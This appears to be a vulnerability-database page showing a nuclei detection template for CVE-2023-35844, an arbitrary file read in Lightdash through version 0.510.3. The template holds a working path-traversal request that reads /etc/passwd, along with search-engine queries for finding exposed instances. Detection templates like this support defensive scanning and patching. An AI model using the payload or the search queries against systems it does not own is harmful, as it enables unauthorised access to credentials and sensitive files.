Lucene search
K

Lightdash version <= 0.510.3 Arbitrary File Read

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 55 Views

Lightdash version <= 0.510.3 Arbitrary File Read. Insecure file endpoints allowing directory traversal without file extension validation leading to unauthorized access to sensitive information

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-35844
19 Jun 202302:15
attackerkb
GithubExploit
Exploit for Path Traversal in Lightdash
26 Jun 202310:14
githubexploit
BDU FSTEC
The vulnerability of the Lightdash data visualization and analysis tool lies in the improper restriction of the path name to the restricted access catalog, allowing attackers to gain unauthorized access to protected information.
28 Oct 202300:00
bdu_fstec
Circl
CVE-2023-35844
19 Jun 202307:25
circl
CNNVD
Lightdash 路径遍历漏洞
19 Jun 202300:00
cnnvd
CVE
CVE-2023-35844
19 Jun 202300:00
cve
Cvelist
CVE-2023-35844
19 Jun 202300:00
cvelist
NVD
CVE-2023-35844
19 Jun 202302:15
nvd
OSV
CVE-2023-35844
19 Jun 202300:00
osv
Prion
Directory traversal
19 Jun 202302:15
prion
Rows per page
id: CVE-2023-35844

info:
  name: Lightdash version <= 0.510.3 Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: |
    packages/backend/src/routers in Lightdash before 0.510.3
    has insecure file endpoints, e.g., they allow .. directory
    traversal and do not ensure that an intended file extension
    (.csv or .png) is used.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.
  remediation: |
    Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.
  reference:
    - https://advisory.dw1.io/59
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
    - https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c
    - https://github.com/lightdash/lightdash/compare/0.510.2...0.510.3
    - https://github.com/lightdash/lightdash/pull/5090
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-35844
    cwe-id: CWE-22
    epss-score: 0.06344
    epss-percentile: 0.92803
    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lightdash
    product: lightdash
    shodan-query:
      - title:"Lightdash"
      - http.title:"lightdash"
    fofa-query: title="lightdash"
    google-query: intitle:"lightdash"
  tags: cve,cve2023,lightdash,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a740c883bf3147d97c932b93f13b7d0ca23bc9d67e90e38b4d6e5aee5cabd88d02205b3375402c45b8acecc88ce45f63a7748d05d2a461c06c9948ac5548eb5af2a2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation